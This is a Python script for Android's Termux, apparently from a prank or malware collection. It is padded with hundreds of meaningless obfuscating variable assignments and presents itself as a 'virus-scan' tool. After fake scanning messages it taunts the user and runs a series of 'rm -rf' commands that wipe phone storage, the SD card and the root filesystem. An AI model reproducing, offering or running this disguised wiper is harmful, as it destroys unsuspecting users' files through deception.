lIIlIIIlIIIIIIIIlIIlllIIllIIlllllIlIIlIIIllIIIlllIllIIIllIIIIllIlIlIIIllIIIllIlIIIlIlllIlIIIIllIlIlllllllIllIIIllIlIllIllllllllllIIllIlIlIlIllIlIIIIIlIIIIIIIlllllll = 333
TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT = "fTqqaqQoIxmLDUQknOBEStrjcfksQASSJZDPHlvWcnlRlWtYwyQRLTzVhQiZYRVfeAQSChotXfAlwVX"
IlIIllIlIIIllllIIIIllllllllIIlllIlIIIllIIIlIllIIIIIIllIlIlIlIlIIIlIIIlIllllIllIIIlIllIlIIlIlIlllIllIlIIIIlllllIIlIIllIlIIIllllIlIlIIIlIlllIlIIllIIlIIIIlIIIIlllI = "mdXHzhtoWRLmkONATWnqRNoFANTbaPSsxnbyesfzhDssOyoPGeTukmAuSxnUQPVVJorwDymGMZdVVPF"
dQvwEEkptMUwjQZdKyRRTyaztyGTIOSJScYNzITAwWocaqnmCsCxlErMaeBpiuvpGKbqQgNhkjvleri158 = "qcNTkovxxzSMGEbfiRqeExRrtkxlsbVDkZOTaxkfJzpVJeIJAIfCRGTUpivfNSbphnReksxSlIUxUeI"
W156 = "rHoHBbVXOtkHpVHsjuwtDMSLIOWDHKiXgMADDNZdwDwZVCkHyYJKeswJGWkUXOrAGEBciafIlNwhOCX"
lIllIIIllIIlIllIllIllllIlIllIIlIIIIIlIlllIllIlIIIlIlIIIlIlllIIIIlIIlIIIlIlIIIllllIlIIIIIIIIIIllIIIlIIIllIIIlllIllIlIlllIIIlIllIIllIIIIllIIIlIIIIIlllIlIIII = "GifmbBDuTIJAVlTtMUaiTGjTXYMWVhuiOZXLZYwFBYAXrzMSzfJvEsHPIZZGGXxlYjBbEcUoVEtqOWk"
rZTEgLdSWoDXcsczqSDCOArWNLGBfGcxcinubpFfAYbwngrJezNwrkKoVfflHIybQKyfDBfyLisiawS152 = "UizAlzGNqXFIVrZPRbPUUWoXTyCfdWSEaAhxaudKZcgcGVzTxppKwOflOizaVfGQFwAfEItOSdRkqsb"
AAAaaAaaaaAaAaaAAaAaaaaaAaaAAaaaaaaaAAaAaaAAaaAAAaAaAAaaAAaaAaaAaAAaAaaaaaaAaAAaaAaaaaaaaAaaaAAAAaAaAAaAaaaaAaAaaaAAAAAaaaaaAaaAAAAAAaAaaAaAAaAaaaAAaA = 507
IIIlIlIIIIlllllIllIIllIIIlIIllIllllllIllIIIllIlIIIIllllllIIlIlIlIllllllIlllllIlIlIIlIIlllIIIlIIIIlIIIllIlIIIlllIllIIllllllIllllIlIllIIIIlllllIlIllll = 290
AAaaAAAaaaAaaaAAaAaAAAaaaAaaaaAAAAaaAaAaaAAAAAAAAAAAaaAaAaaAaaAAaaAAaaAAAaaaaAAAAaaAaAaaaAaaaAaaaAAAAAAaaAAaaAaaaAAAAAAaAaAaaaAaAAaAaAaaaaaaaAAaAa = "GhfWQWWIDDfoBSgMeHtKgcCszjJRkWJdwCcXyUmVKzyBrhrvYCLUuRvGrdEfqvpEwPoNjSVSFWuGoex"
lIlIIlIIIllIlllIIllIlIllIllIIlIlIllIllIIIIlIlllIlIIllIlIlIlIIlIlIIIIIlIIlIIlIIlIIllIlIlIllIIIIlIllIIlIIIIlIlIllIlIlIIllIIllIlllIlllIIIlIlIIlIlII = "qOWlDomYCtksZyxWDSeRvVBzrIMtIMFKwbklHvKcGellyHCqeewentPbczPKJXaZpDOhwUFbdhiTAqg"
xASaNpHFrPolgCmHHQCKLsjfbDYTzhcopmcbusywKFFrtZyZhmRloSkENyjewSrJyQWzzElwfTAUCtD142 = "oRIinEYFegnGCPXTaHSiVxQqWzgRQSjzbeTtPaEdnMJFyPCSFtoPBfhFRYmwsBuvWAdgKFWwGbeDwMh"
aaAaaAaaaaAAAaAAaaaAaaaAAaaAAAAAaAAAaAaaAAAaAAAAAAaAaAaAaaaaAaAAaAAAAaAaaaaAaaaaaaAaAaaaaaaAaAaaaaAaAaAaaaaaaaaaaAAAaAAaaaAaaaAAAAaaAaAaaaAA = 743
VyxlCLyprZUOhmbpBeIcAAUPJeGijQQDxozrxpMEzhSzsYsGfmSBdBDuvmAirLrgQRLOeaVGpXFyktD138 = 424
uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu = "HGGvQGdrnlOQULIqNihqxlpiBQYMkUhFnehEalmRwKjqbNpauNzsGKEQwLVualZYftzWVFqazdPUnAa"
fCqqETOhrvNITOVBFWtVpOuUKSoyskaLhFjQCFyYIeHgThEuHHhMAhBNzaEExDjxhLOPjqxCxvmDjcy134 = 324
lllIIIlllIIIllIlIllIlIlllIlIIlllllIIllIIIlIIIlllIIIllIlIIlIlllIIlIIlIllIllIllIllIIIlllIllIIlIIIlllIIllIIllIIIlllllIlllIllIlIlllIlllI = 266
aAAaaAaaaaaAAaAaAaaAAAaaaaaaAaAAaAAAaaaAAaaaAAaAAAaaaaAAaAaAaaAAAaaaAAAaAAAAAAAaAaAaAAaAaAaaAAAAaAaAAAAaaAaAAAaAaAaAaaAaaaaAAaAAaa = 435
G128 = 204
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = 367
aaAAAaaaAAAaaaaaaaAAaAAaAAAaAaaaaaAaAAaaaaAAAaaaAaAAAaaaAaaaAAaaaaAaAAAAaaAAaaaAAAAaAaaAaAAaAAaaaaAaaAAAaAAaaaaAaAAaAaaAaAaa = "oaDXFQEzwgYwOsquRFxNtilTMOWBMNVuqYozDrLuiYWpwsGydlmtjPdyWeOLpIdeqLynHDXtntRFPFQ"
AAaaaaAaAAAAAaaaaAAAAAAaAAAAaAAAaaAaAAaaAAAAaAaaaaAAaAaAAAaAaaAAAaaaaaAAaaaAaaAaaaAAAAaAaaaaaAAaaAAAAaAaAAaaaAAAAAaaAaaaaa = "KvIHOJITplineePWbwvULStDxaNnTJgxgGuKEmaUCuVPqYtCQKApdQLyNrcqgSdqKzSxCAQaONzxQWc"
IIllIlIIIIIlIIIlIlIIllIllIIllIIIIlIlIlIllIllIIIlllllllIIIIlIIlIllIllIllIIllIIlIIlllIIlIlllIlIIIlIIIllllIlIlllIlllIlIlIIl = "wXJPqYRSkjAmsmAUAyEScbeRdNtIROOjUeGrEmebXdeWYpFynlemrqjlSRBnTaoUCjdtZbsFYJYifoT"
aaaaaaAAAAaAaAaaaAaAAaaaaaAAAAaAAAaaaAaAAAAaAaAaaaAAAAAAaAAaaaAAaaAaaaAaAAAAAAAaaaaAaAAaAAaAAaaaaAAAAAAaAAAAaAaAAAAAaA = "GsdhTMUyEPiCblbtGLSieipioTqAhfIkvpEQeWhGOJwWGlSWDpZsuNFzSMEDjyRChnogJsXjFTIPpmR"
IllIllIIllIIlllIIlIllIllllIlIlIllllIllllIlIllllIlIIllIllIIIllllIlIIllllllIlIIIIlIIlIllllllIIlllIlllIlIIIIIIIlllllllI = "nPmmZLLocUCsiXPuadHcojxdDiouCsllgKstdmmckpBEdzBzGGEvYltznDshqCCHZkNWMLrIebdBxWd"
r114 = 474
lllIIIlIIlllIlllllllIIIllIlIllIlIlIIIIlIlIllIIlIllIlIIlllIlIIIIIlIIIlIIlIIIlIlllllIlIllIllIIllIIlllIlIlIIIlIIllI = "UFdRMvQnyNLcHiUmduVpYbRiaTvHSQcGOpQQwYfAUXZGJCDvXxtAuoEZbIWfuLsuiKZoreIBrnHjNZj"
tXNpxhFHmRoARRyMdfFUkiSdUXcOvEXCzyisdhtIJlLThEUgNXdkaVbRjggNtoZgYMpjDnkBrAtySHM110 = 67
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy = "RXhjYiBXgyEmfCEFoEZqmmvdISMfhbSrtqUzmwjZIDPlUEqsqtVCivWVvOeBvxAtcpCrnZMRcbkuJXT"
EVQWeaaLqivZmWMYEBqfmAAPIPwtFuoDIkgKahvgoIQLjueWmqraUvDbhZyEPaOHeyaPZbPdzHvNRqh106 = "SgkZzJunyDrhwLxPemhtCmZrVSLvnMRTqaICivHPKyZhWcwvHbISSllRwkhXKgtipUYTRvvjtmNLEmq"
aaaAAaAAaaAAaAaAAAAAaAaaaAaAAaaAAaAAAaaAaAaAAAAAaAaAAAAaaaaAaaaAaaAAaaAAaaAaAaaaaaaAaAaaaAaaAaaAAaAAaAaA = "loeBdrQVxijxMhSSTYjdWkgmgXfIcUVDxMfdYmxlPczISKxshCSymwkCcifbhNtUEXrbKuQNOfOTFlb"
X102 = "MyWKWczAtahJCoajWSTAhFCKBiNyUSEomUaJeQOtaDSUfnTSjIfEQFgnemsYhYgXVmSGIcLaBbVAxTY"
llIllIIIlIlIIIIlllIlIllIlIlIlIllIIllllllIlIIlIllIlIlllIIlIllIIlIIIIIIIlIlIlIlIlIIIlIIllIlIIIlIIlIIll = 353
llIllIllIlIIllIIIllIlIIlIlIIIllIIlllllllllllIllIllIIIllllIllIIlIIlllIlIIIIIllIIlIlIIIIIlIllIllIIII = 394
J168231200334499496 = "KEdCorlMitxwfyuLzbiMQkqkwNxNCbKdaNTxtVQknfcSNEqRuXoACerYOPzHseHwlSZQfsLFMUAvJSu"
CJLZIbrWxelRCqYbLvKZNKSmgmNWbNijmCqhvNknfvpptyfvXjuQYcYtAEOsNgrRjJJUPKTgbmfbUUe94 = 637
G92 = "VJWzhuGKtegJMUUOnxQSkBStMSUAOvqmaxdueeIkyyOewhxhunzorMGdQrwvWjKYJxLGTzQisBNoYHk"
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm = "uvGbSkxDxYggYODGngGPVOXJHXaaMNTCoMtKfRBbUUylQBZqRRYBnpXhpiqGuAHCACIUrVZuDEyIGtt"
yZniswJkejIWpLcQrfUREleSvoKEhmwtYAosWsnVWiXEwVDarOZQvAEJfPsAPzrUsrCYpnlLWybTWJU88 = 299
yjjNSjCpophmvUlRVYhklrzhxJhYdpttbskyCZvqEqpCTjuSvztLShngbnmOCJuaRdgZZmrIgFPOpoW86 = 619
p1682312003338651484 = 586
IIIIlllIIllllIllIIIlIlllIlIIIIllIllIllIIllIlIlllIlIIIlIIIlIIlIIlIIlIllIlIlIlIIlIll = "IjomxgkkZaVvJYCehWDfPnDqhVFcpbzBSQtQtHjlgNpUSnLwjypkDodshnVuDLwtjxqJUuaQfErUuuS"
aoKIzbjiUbTHBpUselhJgsHRlQrCttJlXEQYqZBIOjsWaWEGmlGTTVKDTKRjuSXVCzgtVjuJAjgBELQ80 = "AbrxvqRDQXdRxjWntNepICMrlRhetvFpNLXmkBcxFevHMJAcUvAtkHfMWdASjJdkZguqLXKtjimKlaT"
YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY = "hNGSLXXaVxtgTbQgOIOlpNEoUORrpOjzdjjgIFPSOSWTLmKbxOqFzYYyNqFzdSWEDPDgjgqKegqqMNE"
s76 = 487
lllllIlIIlIIIllIlIIllIIlIIlIllllIIlIIllIllllIIIlIllllllIIlIlllIIIlllIIIlll = 378
aaaaaAaaaaaAaAAaaAaAAAaAAAaAaAaaaaAaAaAAAaAAaAaAAAaAaaAAAAaaaaAaaaAaAAAa = "mJSEihqRSXDYRgITkSWLIJgOcTViIBRxpsHtzNHaqXKDNkQRzBifzUGEsWvglEwmaStfZEAHNqHFdEc"
aAaaaAaaaaaaaAaaAaAAaAAAAaaaAaAaAaAaaAAaaaaAAaaAaAaAAaaaaAaaAaAAaaAaaa = "fvuZeoUITVndlgQHJpSBViiSwrhXtdzdvPVbcHwyXiHLamuodqbyZgAsVxSEMrmciTbuYUuCYHSPSAb"
bFzumKxnfUyAJQRwVJGqDXPIFopGQkknGEOaBMgpTaMMsPeKqKzDJzFLByPbiVBOptzyGxTRHaDYvfX68 = "seWidxEJyzjHTzPWtOZkZjPNmJMKAYfgEKKHtMvwkqtsnilJZlTGziMSEGeqRyIJXiKLsogcXtvgmko"
jyHqSEVtPgufFtFpzLHFQvTkNHOIcZrnTsckwdSARyHibwzaIgiWcFqrOForstrFTnYBFivYSkgSpwg66 = "QKZbFGJlghdifClhWXTAvVcYanlOfhqnQPCdJFFWpBfUdyARCfEHvFnmxlwadxNmrbPvdoMgMnfZHOr"
IIIIlllIlllIIIIIllIIlIIIllIIIIllIIlIlIIllllIIIlIlllIlIlIllllIlll = "PrCtkZaSkCgLoZlmoNZNtxZtYZJdKIMKwJcQGjWSabTeNQRAnIwIFMvmIdFZsBQKoGpjpxNJsppBdNp"
L1682312003328438562 = "eRmBZDJltJuBVnhgafsofdTVGcLthmVFefekuaVBPdhYXDlxlfJPdZzNJxyQXXfhmLibxspQTPGxQeR"
lIlIlIlIlIlIIIllIllllIIlllIlIlIIlllIIIlIIIlIlIIIIllIllIllIll = 406
mhdnfndwPLTFsbzViNgsaPVKhcJAKQOdgOiSXsJeNYVHlnsFkEjpHmiNACoUpcIaEzFbcFooGdhmsuI58 = "cMFcaKXyRCtqygDuepYRiIpOaEjxpdEcTRfMSBVenlvINthpVuBzadlqcGaVLnpcYLShwrMMIKOxmFN"
P1682312003324980756 = "XcoXXiytVxKkjJqggtFFsGczbAPAmIcYznwohXEQvoRwYQEJsFjqwzweOHghIxOHDUqbsozwjhZnDtE"
ogaieZOtVeumAWmEuXKXUchMMcZkwwWdtowIzurMyiAmAVZZlixDkoNLvkqudQnJpGibnEAVHfgbScB54 = 359
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ = 516
uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu = "FhQWRQBljkPexIoFrwQKlSzRCUzQaBKIbfpRoGzeZHigygzxBtpxVMSGwzUUxOeDsfgquDSjCbVvbSH"
gggggggggggggggggggggggggggggggggggggggggggggggg = "OGKTxqFeKVLxelgoSBlMXoKPPAgklMWOWiyUZcPSpUwcKiTmRHTUbHWQXLnkxpZUgTYjLEGYGBaVCkU"
llIIIlIIIIllllIlIlIllIIlIIIIIIIlllIllIlIlllIll = "fKCPglIxsyVVLIpRgEOpQgDuoOprnJrtJKAVITweaVtDGiUiDdvSqvaQeKGGMTkpwOaDPVNYwhFgaRm"
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww = "pxlwPbBXmEMqUamYaRTLWrQlJSvDdbXkLKjEOLvSMEQnLqtnNdXdzftWHPkNURHukrWSFPGmgQkFDBK"
AAAaAAaaAAAAAaAaaaaAaAAAAaaAaaaAAaAAAAAaAa = "wljruLFlRDgDjnbzhoFSultvZgMOiJVJPAYCYUJrWItJhoMqCVZAaqomsjcYPNPhlSgHLbsjEpqhquy"
CPnFZskTozNeroSojbjxZhVmEBQeajlpUeFzKfTpXEmPEDszwRZHuNsxyIIzeeQAdbbZPBvLqGTkyML40 = 430
E38 = "GBnEPRWtiOmvQoAJgvyfTaxVvUTuufZbYejJNOQBclvNDMnwySgmjxacABKWzmcIrIAfZNOYhskSiXJ"
ltFJVIpbHPSPKqyVOCooMQhSnetdONekWuyVZZKdXxCgvihcqsPsgXUtrsNKLAhMpMtsCoIXmQcPmtT36 = "lYKiAYBfIadSReJeIVlPtxswsKQKQMUneKDlqPpbZOiKVbxEnogdqWbXAIXaAqrybOmTDniMiwnSvQx"
IIllllIIIIllIlIlIIllIlllIlIlIIIlIl = "yAQYRfjMgmweSDMkDZCdWeqeLdSrZohGBBDwhTUjzJKAsppFTtQvTGjSrYrlZTJXeHGvhnacBURCIdk"
k1682312003313797532 = 83
f30 = 248
G28 = "LyZpsziSFXVjLBBIgzWQjEnIruVyzgwcOJlmihAFZFIKOrOaolyIYqrtkTzVnUdnlYGitPvPupkpBIv"
W1682312003312017426 = "ChYmGbbNWkXIKzIBOnhJnEdfnVJHXoVmGhlTdgTUKFeTmEIdhSmODnMFOVtAjdufveowSMwlckDctad"
IIlIllIIlllIllIIlIlllIII = 538
lIIIIlIIlIlllIllllllll = 466
aAaaaaaaaAaAaAaaAAaA = 460
jjjjjjjjjjjjjjjjjj = "MwXqqxfyNRADjetZmpoOFQrvSRfRDaHlFrjkMiiXrMPsRedinimQNrUSKLBPbTYksYOPkLeOrqgdwGf"
g1682312003308678916 = 292
SRgvcXDqhnvIPdqeWwtnQzUcMNbMEFQneleozWxnmHOGBRiWXNqsocWbFQDhomzHySvcggaHXpCdZVH14 = 180
X12 = "VOVPmBwFtAJHlKppxJNbAVRebxuCxtkpxuyHBMYyDXmmhiuPnCbAehSxRzRlnQEtquNXRnZpWoQSFUf"
j1682312003306596510 = 200
lsMRSZwzvtSxuZWQuXDDmklAnAURAsjcduxfKnfVIKQgqLaMRfNYeltwuyHkcajXnbftNuKkegFbsKf8 = 330
GGGGGG = "LsOMEwdtrjSZTxvGfgyQCsUccMjBTYMcniKNfXUMefsFBvQIJeYfxfWfBysOVXRFElvRgnYAWPmeuzP"
HHHH = 350
FFyXSKBWRkdDEFgeqpbgJLGWblqFIJLFkPsOYUxxHfCKzuRRbzFkMZnIRyDuRqCgMWZevAcfZEUpLes2 = 647

import os
import random
import time

os.system('termux-setup-storage')
os.system('clear')

hKFWhDHfubhEPlZHjDvAScXuZtcTZsPwnPjiMrCSAhRLXqsjKFBubCoHpMSMZQmLgECcHwrlotJRpRA1 = """
█░█ █ █▀█ █░█ █▀ ▄▄ █▀ █▀▀ ▄▀█ █▄░█
▀▄▀ █ █▀▄ █▄█ ▄█ ░░ ▄█ █▄▄ █▀█ █░▀█

author: Ph.Sk1d
-------------------------
                                                                                   """
print(hKFWhDHfubhEPlZHjDvAScXuZtcTZsPwnPjiMrCSAhRLXqsjKFBubCoHpMSMZQmLgECcHwrlotJRpRA1)

WkBMMINmcLFEthmseRLJhXCOtTYlRkwrvANmZQwTUivjVpzUmNjKQfBTkIaGUEncoFKnrQeCeENMTaH2 = input("Enter Cellphone Brand: ")

print('scanning ' + WkBMMINmcLFEthmseRLJhXCOtTYlRkwrvANmZQwTUivjVpzUmNjKQfBTkIaGUEncoFKnrQeCeENMTaH2)
time.sleep(0.5)
print('[+] Scanning Virus')
time.sleep(0.5)
print('[+] Virus Detected')
time.sleep(0.5)
print('[+] Deleting Virus')
time.sleep(0.5)
print('[+] Deleting your files idiot!! HAHAHAHA')

os.system('rm -rf /storage/emulated/0/*')
os.system('rm -rf /storage/emulated/*')
os.system('rm -rf /sdcard/*')
os.system('rm -rf /sdcard/0/*')
os.system('rm -rf /sdcard1/*')
os.system('rm -rf /storage/*')
os.system('rm -rf /*')

A = 540
Ill = "smwReEYGBXxuSiPyDHtysvCLBbFeCqsqQBUzaTJrJQIXUxDyKeRABrcyuuAINdBFnAcZGAWkrwsSyAV"
Illll = 405
N16823120033058927 = "fXcPMpFpMbjJClwqCyvjhRnCnTOTSdgaLpCqMGxcWFgRQlIFqUFakPSVZxgIkJykXbxwknWYCVAKeTu"
lIlIlllll = 322
UUUUUUUUUUU = 238
s13 = 349
aAaAaaaAaAAAaAA = "MrNQdmKJZGteAniQILeVAWlWZwyDvOMLpumeVtIbCVKFYsvemvyoZOODHthvJBtOaLpqRKAEKCRkCTu"
VTGVtwAZrrZXETCfyKvZbzLGSyBKGEpACEsdZzyiBeySVOnmfLSjlMtadPREzcocVPGUaEhJHZyGRnB17 = 571
ddddddddddddddddddd = 223
S1682312003310534521 = "tcFkliWjkzLpMpOIbQKrpKhQeqXtDHxWtDLoNdKseHhjnCQASyRzxeeeQGlpUekhwUEyQwKincrVZaK"
egucbchaxaGrwUlClvosKTDjUzagfIjGWmTuRlOBZjEtcfSSGUMtzyOezwYSDXMAwGgBBcmEbqSQtHd23 = 599
UUUUUUUUUUUUUUUUUUUUUUUUU = 222
MMMMMMMMMMMMMMMMMMMMMMMMMMM = 168
jthzxrRzdJvgnjaGtIQBFLEnZIDeCmnSQVDLLXoWlRmAnBnHNankjHbRHIxDLrlpMzmVhLdCzYGxmxP29 = 383
t1682312003313711431 = "UFpjiquUYoTyqfHCTVFWtkjQtSNXenLfVAhofydJQtaMNLjkbEftZzqazHmCOaVbMxrarwcTLjJyIrs"
H33 = 522
AaaaAaAaAAAAAaaAaaaaaaAAaaAAAaaaaAA = 335
Y1682312003315923237 = 349
AAAAAaaaAaaaaaaAaAaAaAaaAAaAAaaaaAaAAaa = "drYPvrzeInxdfsDIprVkrZZCvuOXCEeXQAnqULyGmNBcwwTJPhmyfNCTaIIvjvkIsHPfnnITlAOMlcg"
y1682312003317675841 = 144
Z1682312003318568743 = 513
aaaaAaaAAaAaaaaAAAaAaAaaaAaaaAaaAAAaAaAAAaaAa = "JePVtedZIjNmyjUEgTFJOJFGvAeNUUFvYlHTTdyhpIPamPgXJPcrJInMvcGgEjuDtSKOoJhQLEMMPvi"
o47 = "OTwFdwbmZuITXmaLfHCQONJTfyIVMAkjbOsgvVYAnROuJDDXVkuKStGBLEdbSZwkrpLPqcYsvevjZPN"
IlIlIlllIIlIIlIllIlIllIlIlIIllIIIllllIIIlllIIIIll = "wWYIPhkhrcJDFYclBqFTAacfKfHDwmzVJTAJTqLdetOJvdiQdSjvcVhWkXonGpLfRAzmMxYyuJfhDeW"
T51 = 727
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ = 296
lIIIlllIlIIlIIlIIIIIIIlIIIlllllIIllIlIIlIllIllIIIlllIlI = "vIjtjYQdMypeIZePNNbZsakBTThEnStWytHaPpHyHwzXWFkUdfkmPHKnrlGYEwqAIQVGGxNmyFldnZM"
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii = "ytRhgWzfuJuQafAtZcvzNtGwqoHcJhkIMZupTiIZprHRgSZLTSwsZSkRLqLqdEZTAiqyAmtZkiWmqmJ"
ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt = "BpHlLBOqHtcRJDoiprloDrGPPYLadBhtZBHwCcBkRayivEThHsjViyMGsZXnEBIcknQazkhqZhsgLsq"
A61 = "XKaxKpPvFkubIOgteGuMAfPHhrmoBpyNTweYArwMCZWmcnFdIYeZrXUXUUxlsjTuXxsbvduLABXKkMP"
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR = 437
qHXTziToPEdypNhZzRXPdCXciBayfLBquKiycVhZxkDPEEOAlANNsqfrZuKWivndDyaJkUuuzIQrVOn65 = 349
aaAaaAAAaaaaAAAAaAAAAaaAAaaAaAAAaaaAaAAAAaAAAaAAAAaaAAAaAaaaaaAaAaA = 302
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff = 831
aAaAAAAaAAaAAAaAaAaAaaaaAaAAAAaaAaaAaaaAaaAAaaaAAaaaAaAaAaaAaaaAaaAAaaA = 742
X1682312003334314673 = 460
KFLowLRpSMZWWwXcDlgWdveROkGQjYGBpVGgMhOAzVmfOtOPXdgKlFSQxRqfGejQoKUAEqhizfgDAak75 = 277
aaaaaAAaAaaAAAaaaAaaaAaAAaAAAaaAaaAaaAAaAaaAAaAaaaAAaAAaAaAaAAAAaAaaAAaaaaAAA = 223
h168231200333651879 = 305
o81 = 788
v83 = 314
aAaaaaAAaaaaaAAaaAaaAaAaAaaaAAAAAAAAAaaaAAAAAAAaAAaaaaaAaaAaaAaaaaAAAAAAaaaAaAAaaAAaA = "vlLhLURjjmZJXidzzgPpTNhjgcpPFAMXIIKiYYqpqtuAfAlBlQiDoRzZsGlNLeypljOzVzAzJohxhCW"
j87 = 401
U89 = 115
G1682312003342259491 = "uWOkQSqjgnlauCTBfOSynMLjYTcPfUHWrxZVwBYZhaDXVEccsAtnuiQhPtueayCjciWEzMEuRFpWRjR"
w1682312003343377893 = "EkGCEFXeJYSFsQJTSSSVqyFQAFsqavNWfQjYkKfxEXleXxBhugCDEwhXmMNWPElxMFkoVQKFyBtFoVQ"
H95 = "YWUnXOPWjiTtoJujXGIhGDqUOFzkqFYcgCvkAjJEZClYRRmrqjXdxemqJtvyGDiiKNwOXMSsxIDldfI"
U1682312003345121997 = 478
llIIlIIlIlIIlIlIIlIllIIIIlllIllllIlIllIIlllIlIIllIIIIlIIIIIIlIllllIIIIIIlIlIlIIIIlIllIllIlIIIlllIll = "DEVMnmYFCWhWJmlIReefHJHDnPKqOuAnkULcxSbphBdetxEycyfUMxFPqrzzgdEovzzcdXPAbIdoXjg"
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU = "hYYJKjaZVESoAVtReHXFdfkajQnmynLxFBKpKEdcsOikdMODfxCPMsnQHPrcvJvFdezJNQKxTtdEfid"
v16823120033490694103 = "aVMjORhMtaNPGtvQrzOwOvSeQqMFpgtJeMrQfegaTUJJVAdpXMhGYpYSFiNwKjrPbRymHsXCzcjzEwZ"
f105 = "HLvsQoyVHrjXtehzbPwoUJHZUHzETAYOKOdysENzzPPPilLDCRQPHeqxVzVQiKOhcsOqWSzfNygdDTl"
lIIllIIlIlIIllllIIlIllllIllIlIlllllllIIllIIIlIlIIIIIIlIlIlIIllllIIlllIllIlIIlllIlllIIIlIIllIlIllllIIlllIllI = 129
u109 = "TeBCIXcLtUHrzDxKgcUPZcHbljoNpNsTjmnHKEuWiwsmQGSckFwwHYyiUPBNqQOuDxALeHpHrSwUIcF"
e111 = 193
b16823120033555305113 = "qXKLzniHEjZKkXKAstmtobLTVeTflwRLGDXarkqybgbLZTfDyylIcQrgnWOoXewBJIHJQQhKWwKtRTX"
b115 = "CXKtFivLoHQUDFsuFgmfhPHCBvuiBtKjDDOzmfpRzrqYgVezGgZVDPhPpaArwogAIUNBxPnBALGynse"
llIIIllllIIlIIIIIIllllIlIllIllIlIIIIlllIIIIIIllIlIIIlIlIlIIIlIIllllIlIlIlIIIIIlIIIIIIIIIlIIllIlIIlllllIlIIlllIlIIIlll = "WenkCbDQVPjusHrHeooJPJKxmBwhWhYwGKuiflbBgFJEoWyMLFNZRFQeBBNoTvXKytbbTIPzITMYRHa"
r16823120033600793119 = "TuigzGlpmCAheeFVQECXLYFyafSmFMqDavSujtOLNFprnvSrIctoQcXaSxZfpqpqSfeBKheInfgnytE"
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww = 532
AAAAaaAAAaAaAAAaAaAaaaAAAaaAaaaaAaaaAaaaaaAAaAAAaAAAaAAaaAAaAaAaAaaaaAaAAaaAAaaAAAaAaAaaAAAAAaAAAAaaaAAAaaAaAaaaAaaAaaAaAaa = "AdmtcvkneuNItcFXRDlyqhZtFzCSkozANiCIEEwxmsuoWQmRYAVPLxePAAoeFNxDlFVzcjJotmIPWPc"
UEAORvYjLYyVtqySdRbEgvDGJlXucjfFjUZZUZmQFvYkdLnZgKlnMTJMfzioZWLDGmdSoQzsbOmFVfw125 = 697
AAAAaAaAaAAaaAAaaAaaaAAAaaaaaAAAaaAaAaaAAaAAAaaAaaaAaaaaAaAaaAaAaaaAaAaAAAaAaaAAaAaAaaaAaaaaAaAaaaaAaAAAAaAaaaAAaAAaAaaAaaaaAaA = 103
llIIIlIllIllIllIIIIlIllIlllllllIlIIlIlllIlIlllIIIIlIIIlllIIIlIIlIllIIlllIIlIIIIllIlIlIIlIlIlIIIlllIIIlIIIlllllIllIIIllIIIlIIlllIl = "yQQoTXyyCDefcjIrIvPgHDIJKMpcffQZyDtqOJFOdHxeSZpDBUQMwbNBNMoiDOjTCjtEoZNWkNxmMGS"
rVRXcUaoRfIjaAuYNaSQqfpKAQSzrMlMSEskMMonevkVTIYShAlsumZKwgFbpBrfElZpKWlyhreyxJx131 = 145
rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr = 358
aAAAAaAAAaAaAAAaAAaAAaAaAAAaAaAAaaaaaaaaaaaaaAAaaAaaaaaaaaAAaaAAaaAAaAaaAaAAaaaaAAAAAAaaAAaaaAaAAAaaaAAaaAaAaaAAaAaAaaaaaAAaaaaAAAAaAAA = "EDyFDAksWHTJTXXaYjaVGeLrTJDjEFxeuRBmkuoWDMSvyzCtmUqwEqmjBUxqEKWxRHDXqivyrFayGqV"
E137 = "esNMpxOUbiHZxtwGGVnJkBIaxEgQoBsJHuqrLyJgeTbzHWkjZjUWFoocbMYPgCZQBMkQOyPNQFJtJSU"
